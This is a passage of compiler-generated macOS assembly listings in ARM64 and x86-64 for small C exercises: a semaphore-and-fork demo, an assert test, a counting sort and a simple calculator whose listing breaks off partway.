.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #128 .cfi_def_cfa_offset 128 stp x29, x30, [sp, #112] ; 16-byte Folded Spill add x29, sp, #112 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov w1, #0 stur wzr, [x29, #-4] stur wzr, [x29, #-12] adrp x8, l___const.main.pathname@PAGE add x8, x8, l___const.main.pathname@PAGEOFF ldr w9, [x8] sub x0, x29, #28 stur w9, [x29, #-28] ldur w8, [x8, #3] stur w8, [x0, #3] bl _ftok stur w0, [x29, #-32] ldur w0, [x29, #-32] mov w1, #2 mov w2, #950 bl _semget stur w0, [x29, #-8] subs w8, w0, #0 cset w8, ge tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf mov w0, #-1 bl _exit LBB0_2: sub x1, x29, #18 sturh wzr, [x29, #-18] mov w8, #1 sturh w8, [x29, #-16] sturh wzr, [x29, #-14] ldur w0, [x29, #-8] mov x2, #1 bl _semop subs w8, w0, #0 cset w8, ge tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf mov w0, #-1 bl _exit LBB0_4: sub x1, x29, #18 mov w8, #1 sturh w8, [x29, #-18] ldur w0, [x29, #-8] mov x2, #1 bl _semop subs w8, w0, #0 cset w8, ge tbnz w8, #0, LBB0_6 b LBB0_5 LBB0_5: adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf mov w0, #-1 bl _exit LBB0_6: bl _fork subs w8, w0, #0 cset w8, le tbnz w8, #0, LBB0_9 b LBB0_7 LBB0_7: adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf b LBB0_8 LBB0_8: ; =>This Inner Loop Header: Depth=1 ldur w9, [x29, #-12] ; implicit-def: $x8 mov x8, x9 str x8, [sp, #48] ; 8-byte Folded Spill mov x9, sp str x8, [x9] adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _printf sub x1, x29, #18 stur x1, [x29, #-48] ; 8-byte Folded Spill sturh wzr, [x29, #-18] mov w8, #65535 sturh w8, [x29, #-16] ldur w0, [x29, #-8] mov x2, #1 stur x2, [x29, #-40] ; 8-byte Folded Spill bl _semop ldur x1, [x29, #-48] ; 8-byte Folded Reload ldur x2, [x29, #-40] ; 8-byte Folded Reload mov w8, #1 stur w8, [x29, #-52] ; 4-byte Folded Spill sturh w8, [x29, #-18] ldur w0, [x29, #-8] bl _semop ldur w8, [x29, #-52] ; 4-byte Folded Reload ldur x1, [x29, #-48] ; 8-byte Folded Reload ldur x2, [x29, #-40] ; 8-byte Folded Reload sturh wzr, [x29, #-18] sturh w8, [x29, #-16] ldur w0, [x29, #-8] bl _semop ldur w8, [x29, #-52] ; 4-byte Folded Reload ldur x1, [x29, #-48] ; 8-byte Folded Reload ldur x2, [x29, #-40] ; 8-byte Folded Reload sturh w8, [x29, #-18] ldur w0, [x29, #-8] bl _semop ldur w8, [x29, #-12] add w8, w8, #1 stur w8, [x29, #-12] b LBB0_8 LBB0_9: adrp x0, l_.str.5@PAGE add x0, x0, l_.str.5@PAGEOFF bl _printf b LBB0_10 LBB0_10: ; =>This Inner Loop Header: Depth=1 ldur w9, [x29, #-12] ; implicit-def: $x8 mov x8, x9 str x8, [sp, #16] ; 8-byte Folded Spill mov x9, sp str x8, [x9] adrp x0, l_.str.6@PAGE add x0, x0, l_.str.6@PAGEOFF bl _printf sub x1, x29, #18 str x1, [sp, #32] ; 8-byte Folded Spill sturh wzr, [x29, #-18] mov w8, #65535 sturh w8, [x29, #-16] ldur w0, [x29, #-8] mov x2, #1 str x2, [sp, #40] ; 8-byte Folded Spill bl _semop ldr x1, [sp, #32] ; 8-byte Folded Reload ldr x2, [sp, #40] ; 8-byte Folded Reload mov w8, #1 str w8, [sp, #28] ; 4-byte Folded Spill sturh w8, [x29, #-18] ldur w0, [x29, #-8] bl _semop ldr w8, [sp, #28] ; 4-byte Folded Reload ldr x1, [sp, #32] ; 8-byte Folded Reload ldr x2, [sp, #40] ; 8-byte Folded Reload sturh wzr, [x29, #-18] sturh w8, [x29, #-16] ldur w0, [x29, #-8] bl _semop ldr w8, [sp, #28] ; 4-byte Folded Reload ldr x1, [sp, #32] ; 8-byte Folded Reload ldr x2, [sp, #40] ; 8-byte Folded Reload sturh w8, [x29, #-18] ldur w0, [x29, #-8] bl _semop ldur w8, [x29, #-12] add w8, w8, #1 stur w8, [x29, #-12] b LBB0_10 .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l___const.main.pathname: ; @__const.main.pathname .asciz "lw13.c" l_.str: ; @.str .asciz "Can't create semaphore set\n" l_.str.1: ; @.str.1 .asciz "fuck Can't add 1 to semaphore\n" l_.str.2: ; @.str.2 .asciz "suck Can't add 1 to semaphore\n" l_.str.3: ; @.str.3 .asciz "I'm inside parent)))\n" l_.str.4: ; @.str.4 .asciz "Iteration a %d\n" l_.str.5: ; @.str.5 .asciz "I'm inside child)))\n" l_.str.6: ; @.str.6 .asciz "Iteration b %d\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movl $0, -4(%rbp) movl $0, -12(%rbp) movl L___const.main.pathname(%rip), %eax movl %eax, -31(%rbp) movw L___const.main.pathname+4(%rip), %ax movw %ax, -27(%rbp) movb L___const.main.pathname+6(%rip), %al movb %al, -25(%rbp) leaq -31(%rbp), %rdi xorl %esi, %esi callq _ftok movl %eax, -36(%rbp) movl -36(%rbp), %edi movl $2, %esi movl $950, %edx ## imm = 0x3B6 callq _semget movl %eax, -8(%rbp) cmpl $0, %eax jge LBB0_2 ## %bb.1: leaq L_.str(%rip), %rdi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _printf movl $-1, %edi callq _exit LBB0_2: movw $0, -24(%rbp) movw $1, -22(%rbp) movw $0, -20(%rbp) movl -8(%rbp), %edi leaq -24(%rbp), %rsi movl $1, %edx callq _semop cmpl $0, %eax jge LBB0_4 ## %bb.3: leaq L_.str.1(%rip), %rdi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _printf movl $-1, %edi callq _exit LBB0_4: movw $1, -24(%rbp) movl -8(%rbp), %edi leaq -24(%rbp), %rsi movl $1, %edx callq _semop cmpl $0, %eax jge LBB0_6 ## %bb.5: leaq L_.str.2(%rip), %rdi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _printf movl $-1, %edi callq _exit LBB0_6: callq _fork cmpl $0, %eax jle LBB0_9 ## %bb.7: leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf LBB0_8: ## =>This Inner Loop Header: Depth=1 movl -12(%rbp), %esi leaq L_.str.4(%rip), %rdi movb $0, %al callq _printf movw $0, -24(%rbp) movw $-1, -22(%rbp) movl -8(%rbp), %edi leaq -24(%rbp), %rsi movl $1, %edx callq _semop movw $1, -24(%rbp) movl -8(%rbp), %edi leaq -24(%rbp), %rsi movl $1, %edx callq _semop movw $0, -24(%rbp) movw $1, -22(%rbp) movl -8(%rbp), %edi leaq -24(%rbp), %rsi movl $1, %edx callq _semop movw $1, -24(%rbp) movl -8(%rbp), %edi leaq -24(%rbp), %rsi movl $1, %edx callq _semop movl -12(%rbp), %eax addl $1, %eax movl %eax, -40(%rbp) ## 4-byte Spill movl %eax, -12(%rbp) jmp LBB0_8 LBB0_9: leaq L_.str.5(%rip), %rdi movb $0, %al callq _printf LBB0_10: ## =>This Inner Loop Header: Depth=1 movl -12(%rbp), %esi leaq L_.str.6(%rip), %rdi movb $0, %al callq _printf movw $0, -24(%rbp) movw $-1, -22(%rbp) movl -8(%rbp), %edi leaq -24(%rbp), %rsi movl $1, %edx callq _semop movw $1, -24(%rbp) movl -8(%rbp), %edi leaq -24(%rbp), %rsi movl $1, %edx callq _semop movw $0, -24(%rbp) movw $1, -22(%rbp) movl -8(%rbp), %edi leaq -24(%rbp), %rsi movl $1, %edx callq _semop movw $1, -24(%rbp) movl -8(%rbp), %edi leaq -24(%rbp), %rsi movl $1, %edx callq _semop movl -12(%rbp), %eax addl $1, %eax movl %eax, -44(%rbp) ## 4-byte Spill movl %eax, -12(%rbp) jmp LBB0_10 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L___const.main.pathname: ## @__const.main.pathname .asciz "lw13.c" L_.str: ## @.str .asciz "Can't create semaphore set\n" L_.str.1: ## @.str.1 .asciz "fuck Can't add 1 to semaphore\n" L_.str.2: ## @.str.2 .asciz "suck Can't add 1 to semaphore\n" L_.str.3: ## @.str.3 .asciz "I'm inside parent)))\n" L_.str.4: ## @.str.4 .asciz "Iteration a %d\n" L_.str.5: ## @.str.5 .asciz "I'm inside child)))\n" L_.str.6: ## @.str.6 .asciz "Iteration b %d\n" .subsections_via_symbols
the_stack_data/51700313.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] ldur x8, [x29, #-12] str x8, [sp, #8] ldur w8, [x29, #-12] ; kill: def $x8 killed $w8 subs x8, x8, #8 cset w8, hi tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: sub x0, x29, #12 ldur w8, [x29, #-12] mov x2, x8 mov w1, #0 mov x3, #8 bl ___memset_chk b LBB0_2 LBB0_2: ldr w8, [sp, #8] ; kill: def $x8 killed $w8 subs x8, x8, #8 cset w8, ne mov w9, #1 str w9, [sp, #4] ; 4-byte Folded Spill tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: ldurb w8, [x29, #-8] and w8, w8, #0x1 ands w8, w8, #0xff cset w8, eq str w8, [sp, #4] ; 4-byte Folded Spill b LBB0_4 LBB0_4: ldr w8, [sp, #4] ; 4-byte Folded Reload eor w9, w8, #0x1 ; implicit-def: $x8 mov x8, x9 ands x8, x8, #0x1 cset w8, eq tbnz w8, #0, LBB0_6 b LBB0_5 LBB0_5: adrp x0, l___func__.main@PAGE add x0, x0, l___func__.main@PAGEOFF adrp x1, l_.str@PAGE add x1, x1, l_.str@PAGEOFF mov w2, #24 adrp x3, l_.str.1@PAGE add x3, x3, l_.str.1@PAGEOFF bl ___assert_rtn LBB0_6: b LBB0_7 LBB0_7: ldur w0, [x29, #-4] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l___func__.main: ; @__func__.main .asciz "main" l_.str: ; @.str .asciz "82678.c" l_.str.1: ; @.str.1 .asciz "b1.dummy != sizeof(struct blob) || b.bit == 0" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl $0, -4(%rbp) movq -16(%rbp), %rax movq %rax, -24(%rbp) movl -16(%rbp), %eax ## kill: def $rax killed $eax cmpq $8, %rax ja LBB0_2 ## %bb.1: leaq -16(%rbp), %rdi movl -16(%rbp), %eax movl %eax, %edx xorl %esi, %esi movl $8, %ecx callq ___memset_chk LBB0_2: movl -24(%rbp), %eax movl %eax, %ecx movb $1, %al cmpq $8, %rcx movb %al, -25(%rbp) ## 1-byte Spill jne LBB0_4 ## %bb.3: movb -12(%rbp), %al andb $1, %al movzbl %al, %eax cmpl $0, %eax sete %al movb %al, -25(%rbp) ## 1-byte Spill LBB0_4: movb -25(%rbp), %al ## 1-byte Reload xorb $-1, %al andb $1, %al movzbl %al, %eax cltq cmpq $0, %rax je LBB0_6 ## %bb.5: leaq L___func__.main(%rip), %rdi leaq L_.str(%rip), %rsi leaq L_.str.1(%rip), %rcx movl $24, %edx callq ___assert_rtn LBB0_6: jmp LBB0_7 LBB0_7: movl -4(%rbp), %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L___func__.main: ## @__func__.main .asciz "main" L_.str: ## @.str .asciz "82678.c" L_.str.1: ## @.str.1 .asciz "b1.dummy != sizeof(struct blob) || b.bit == 0" .subsections_via_symbols
the_stack_data/82678.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 mov w9, #14512 movk w9, #1, lsl #16 adrp x16, ___chkstk_darwin@GOTPAGE ldr x16, [x16, ___chkstk_darwin@GOTPAGEOFF] blr x16 sub sp, sp, #19, lsl #12 ; =77824 sub sp, sp, #2224 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-24] str wzr, [sp, #32] mov x9, sp add x8, sp, #28 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf b LBB0_1 LBB0_1: ; =>This Loop Header: Depth=1 ; Child Loop BB0_3 Depth 2 ; Child Loop BB0_7 Depth 2 ; Child Loop BB0_11 Depth 2 ; Child Loop BB0_15 Depth 2 ; Child Loop BB0_18 Depth 3 ldr w8, [sp, #28] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB0_25 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 str wzr, [sp, #24] b LBB0_3 LBB0_3: ; Parent Loop BB0_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #24] mov w9, #10001 subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_6 b LBB0_4 LBB0_4: ; in Loop: Header=BB0_3 Depth=2 ldrsw x10, [sp, #24] add x9, sp, #9, lsl #12 ; =36864 add x9, x9, #3172 mov w8, #0 str w8, [x9, x10, lsl #2] b LBB0_5 LBB0_5: ; in Loop: Header=BB0_3 Depth=2 ldr w8, [sp, #24] add w8, w8, #1 str w8, [sp, #24] b LBB0_3 LBB0_6: ; in Loop: Header=BB0_1 Depth=1 str wzr, [sp, #24] b LBB0_7 LBB0_7: ; Parent Loop BB0_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #24] ldr w9, [sp, #28] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_10 b LBB0_8 LBB0_8: ; in Loop: Header=BB0_7 Depth=2 ldrsw x9, [sp, #24] add x8, sp, #36 add x8, x8, x9, lsl #2 mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf b LBB0_9 LBB0_9: ; in Loop: Header=BB0_7 Depth=2 ldr w8, [sp, #24] add w8, w8, #1 str w8, [sp, #24] b LBB0_7 LBB0_10: ; in Loop: Header=BB0_1 Depth=1 str wzr, [sp, #24] b LBB0_11 LBB0_11: ; Parent Loop BB0_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #24] ldr w9, [sp, #28] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_14 b LBB0_12 LBB0_12: ; in Loop: Header=BB0_11 Depth=2 ldrsw x9, [sp, #24] add x8, sp, #36 ldrsw x9, [x8, x9, lsl #2] add x8, sp, #9, lsl #12 ; =36864 add x8, x8, #3172 add x9, x8, x9, lsl #2 ldr w8, [x9] add w8, w8, #1 str w8, [x9] b LBB0_13 LBB0_13: ; in Loop: Header=BB0_11 Depth=2 ldr w8, [sp, #24] add w8, w8, #1 str w8, [sp, #24] b LBB0_11 LBB0_14: ; in Loop: Header=BB0_1 Depth=1 str wzr, [sp, #24] b LBB0_15 LBB0_15: ; Parent Loop BB0_1 Depth=1 ; => This Loop Header: Depth=2 ; Child Loop BB0_18 Depth 3 ldr w8, [sp, #24] mov w9, #10001 subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_24 b LBB0_16 LBB0_16: ; in Loop: Header=BB0_15 Depth=2 ldrsw x9, [sp, #24] add x8, sp, #9, lsl #12 ; =36864 add x8, x8, #3172 ldr w8, [x8, x9, lsl #2] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB0_22 b LBB0_17 LBB0_17: ; in Loop: Header=BB0_15 Depth=2 str wzr, [sp, #20] b LBB0_18 LBB0_18: ; Parent Loop BB0_1 Depth=1 ; Parent Loop BB0_15 Depth=2 ; => This Inner Loop Header: Depth=3 ldr w8, [sp, #20] ldrsw x10, [sp, #24] add x9, sp, #9, lsl #12 ; =36864 add x9, x9, #3172 ldr w9, [x9, x10, lsl #2] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_21 b LBB0_19 LBB0_19: ; in Loop: Header=BB0_18 Depth=3 ldr w9, [sp, #24] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf b LBB0_20 LBB0_20: ; in Loop: Header=BB0_18 Depth=3 ldr w8, [sp, #20] add w8, w8, #1 str w8, [sp, #20] b LBB0_18 LBB0_21: ; in Loop: Header=BB0_15 Depth=2 b LBB0_22 LBB0_22: ; in Loop: Header=BB0_15 Depth=2 b LBB0_23 LBB0_23: ; in Loop: Header=BB0_15 Depth=2 ldr w8, [sp, #24] add w8, w8, #1 str w8, [sp, #24] b LBB0_15 LBB0_24: ; in Loop: Header=BB0_1 Depth=1 adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf mov x9, sp add x8, sp, #28 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf b LBB0_1 LBB0_25: ldur x9, [x29, #-24] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_27 b LBB0_26 LBB0_26: bl ___stack_chk_fail LBB0_27: mov w0, #0 add sp, sp, #19, lsl #12 ; =77824 add sp, sp, #2224 ldp x29, x30, [sp, #16] ; 16-byte Folded Reload ldp x28, x27, [sp], #32 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d" l_.str.1: ; @.str.1 .asciz "%d " l_.str.2: ; @.str.2 .asciz "\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl $80032, %eax ## imm = 0x138A0 callq ____chkstk_darwin subq %rax, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -80020(%rbp) leaq L_.str(%rip), %rdi leaq -80024(%rbp), %rsi movb $0, %al callq _scanf LBB0_1: ## =>This Loop Header: Depth=1 ## Child Loop BB0_3 Depth 2 ## Child Loop BB0_7 Depth 2 ## Child Loop BB0_11 Depth 2 ## Child Loop BB0_15 Depth 2 ## Child Loop BB0_18 Depth 3 cmpl $0, -80024(%rbp) je LBB0_25 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movl $0, -80028(%rbp) LBB0_3: ## Parent Loop BB0_1 Depth=1 ## => This Inner Loop Header: Depth=2 cmpl $10001, -80028(%rbp) ## imm = 0x2711 jge LBB0_6 ## %bb.4: ## in Loop: Header=BB0_3 Depth=2 movslq -80028(%rbp), %rax movl $0, -40016(%rbp,%rax,4) ## %bb.5: ## in Loop: Header=BB0_3 Depth=2 movl -80028(%rbp), %eax addl $1, %eax movl %eax, -80028(%rbp) jmp LBB0_3 LBB0_6: ## in Loop: Header=BB0_1 Depth=1 movl $0, -80028(%rbp) LBB0_7: ## Parent Loop BB0_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -80028(%rbp), %eax cmpl -80024(%rbp), %eax jge LBB0_10 ## %bb.8: ## in Loop: Header=BB0_7 Depth=2 movslq -80028(%rbp), %rax leaq -80016(%rbp), %rsi shlq $2, %rax addq %rax, %rsi leaq L_.str(%rip), %rdi movb $0, %al callq _scanf ## %bb.9: ## in Loop: Header=BB0_7 Depth=2 movl -80028(%rbp), %eax addl $1, %eax movl %eax, -80028(%rbp) jmp LBB0_7 LBB0_10: ## in Loop: Header=BB0_1 Depth=1 movl $0, -80028(%rbp) LBB0_11: ## Parent Loop BB0_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -80028(%rbp), %eax cmpl -80024(%rbp), %eax jge LBB0_14 ## %bb.12: ## in Loop: Header=BB0_11 Depth=2 movslq -80028(%rbp), %rax movslq -80016(%rbp,%rax,4), %rax movl -40016(%rbp,%rax,4), %ecx addl $1, %ecx movl %ecx, -40016(%rbp,%rax,4) ## %bb.13: ## in Loop: Header=BB0_11 Depth=2 movl -80028(%rbp), %eax addl $1, %eax movl %eax, -80028(%rbp) jmp LBB0_11 LBB0_14: ## in Loop: Header=BB0_1 Depth=1 movl $0, -80028(%rbp) LBB0_15: ## Parent Loop BB0_1 Depth=1 ## => This Loop Header: Depth=2 ## Child Loop BB0_18 Depth 3 cmpl $10001, -80028(%rbp) ## imm = 0x2711 jge LBB0_24 ## %bb.16: ## in Loop: Header=BB0_15 Depth=2 movslq -80028(%rbp), %rax cmpl $0, -40016(%rbp,%rax,4) je LBB0_22 ## %bb.17: ## in Loop: Header=BB0_15 Depth=2 movl $0, -80032(%rbp) LBB0_18: ## Parent Loop BB0_1 Depth=1 ## Parent Loop BB0_15 Depth=2 ## => This Inner Loop Header: Depth=3 movl -80032(%rbp), %eax movslq -80028(%rbp), %rcx cmpl -40016(%rbp,%rcx,4), %eax jge LBB0_21 ## %bb.19: ## in Loop: Header=BB0_18 Depth=3 movl -80028(%rbp), %esi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf ## %bb.20: ## in Loop: Header=BB0_18 Depth=3 movl -80032(%rbp), %eax addl $1, %eax movl %eax, -80032(%rbp) jmp LBB0_18 LBB0_21: ## in Loop: Header=BB0_15 Depth=2 jmp LBB0_22 LBB0_22: ## in Loop: Header=BB0_15 Depth=2 jmp LBB0_23 LBB0_23: ## in Loop: Header=BB0_15 Depth=2 movl -80028(%rbp), %eax addl $1, %eax movl %eax, -80028(%rbp) jmp LBB0_15 LBB0_24: ## in Loop: Header=BB0_1 Depth=1 leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf leaq L_.str(%rip), %rdi leaq -80024(%rbp), %rsi movb $0, %al callq _scanf jmp LBB0_1 LBB0_25: movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_27 ## %bb.26: xorl %eax, %eax addq $80032, %rsp ## imm = 0x138A0 popq %rbp retq LBB0_27: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d" L_.str.1: ## @.str.1 .asciz "%d " L_.str.2: ## @.str.2 .asciz "\n" .subsections_via_symbols
the_stack_data/242330599.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf mov x9, sp sub x8, x29, #5 str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _scanf adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf mov x9, sp sub x8, x29, #16 str x8, [x9] sub x8, x29, #24 str x8, [x9, #8] adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _scanf ldursb w8, [x29, #-5] subs w8, w8, #42 ; kill: def $x8 killed $w8 str x8, [sp, #32] ; 8-byte Folded Spill subs x8, x8, #5 cset w8, hi tbnz w8, #0, LBB0_6 ; %bb.1: ldr x11, [sp, #32] ; 8-byte Folded Reload adrp x10, lJTI0_0@PAGE add x10, x10, lJTI0_0@PAGEOFF Ltmp0: adr x8, Ltmp0 ldrsw x9, [x10, x11, lsl #2] add x8, x8, x9 br x8 LBB0_2: ldur d2, [x29, #-16] ldur d1, [x29, #-24] ldur d0, [x29, #-16] ldur d3, [x29, #-24] fadd d0, d0, d3 mov x8, sp str d2, [x8] str d1, [x8, #8] str d0, [x8, #16] adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _printf b LBB0_7 LBB0_3: ldur d2, [x29, #-16] ldur d1, [x29, #-24] ldur d0, [x29, #-16] ldur d3, [x29, #-24] fsub d0, d0, d3 mov x8, sp str d2, [x8] str d1, [x8, #8] str d0, [x8, #16] adrp x0, l_.str.5@PAGE add x0, x0, l_.str.5@PAGEOFF bl _printf b LBB0_7 LBB0_4: ldur d2, [x29, #-16] ldur d1, [x29, #-24] ldur d0, [x29, #-16] ldur d3, [x29, #-24] fmul d0, d0, d3 mov x8, sp str d2, [x8] str d1, [x8, #8] str d0, [x8, #16] adrp x0, l_.str.6@PAGE add x0, x0, l_.str.6@PAGEOFF bl _printf b LBB0_7 LBB0_5: ldur d2, [x29, #-16] ldur d1, [x29, #-24] ldur d0, [x29, #-16] ldur d3, [x29, #-24] fdiv d0, d0, d3 mov x8, sp str d2, [x8] str d1, [x8, #8] str d0, [x8, #16] adrp x0, l_.str.7@PAGE add x0, x0, l_.str.7@PAGEOFF bl _printf b LBB0_7 LBB0_6: adrp x0, l_.str.8@PAGE add x0, x0, l_.str.8@PAGEOFF bl _printf b LBB0_7 LBB0_7: mov w0, #0 ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc .p2align 2 lJTI0_0: .long LBB0_4-Ltmp0 .long LBB0_2-Ltmp0 .long LBB0_6-Ltmp0 .long LBB0_3-Ltmp0 .long LBB0_6-Ltmp0 .long LBB0_5-Ltmp0 ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Enter an operator (+, -, *,): " l_.str.1: ; @.str.1 .asciz "%c" l_.str.2: ; @.str.2 .asciz "Enter two operands: " l_.str.3: ; @.str.3 .asciz "%lf %lf" l_.str.4: ; @.str.4 .asciz "%.1lf + %.1lf = %.1lf" l_.str.5: ; @.str.5 .asciz "%.1lf - %.1lf = %.1lf" l_.str.6: ; @.str.6 .asciz "%.1lf * %.1lf = %.1lf" l_.str.7: ; @.str.7 .asciz "%.1lf / %.1lf = %.1lf" l_.str.8: ; @.str.8 .asciz "Error! operator is not correct" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movl $0, -4(%rbp) leaq L_.str(%rip), %rdi xorl %eax, %eax ## kill: def $al killed $al killed $eax movb %al, -33(%rbp) ## 1-byte Spill callq _printf ## kill: def $ecx killed $eax movb -33(%rbp), %al ## 1-byte Reload leaq L_.str.1(%rip), %rdi leaq -5(%rbp), %rsi callq _scanf ## kill: def $ecx killed $eax movb -33(%rbp), %al ## 1-byte Reload leaq L_.str.2(%rip), %rdi callq _printf ## kill: def $ecx killed $eax movb -33(%rbp), %al ## 1-byte Reload leaq L_.str.3(%rip), %rdi leaq -16(%rbp), %rsi leaq -24(%rbp), %rdx callq _scanf movsbl -5(%rbp), %eax addl $-42, %eax movl %eax, %ecx movq %rcx, -32(%rbp) ## 8-byte Spill subl $5, %eax ja LBB0_5 ## %bb.7: movq -32(%rbp), %rax ## 8-byte Reload leaq LJTI0_0(%rip), %rcx movslq (%rcx,%rax,4), %rax addq %rcx, %rax jmpq *%rax LBB0_1: movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero movsd -24(%rbp), %xmm1 ## xmm1 = mem[0],zero movsd -16(%rbp), %xmm2 ## xmm2 = mem[0],zero addsd -24(%rbp), %xmm2 leaq L_.str.4(%rip), %rdi movb $3, %al callq _printf jmp LBB0_6 LBB0_2: movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero movsd -24(%rbp), %xmm1 ## xmm1 = mem[0],zero movsd -16(%rbp), %xmm2 ## 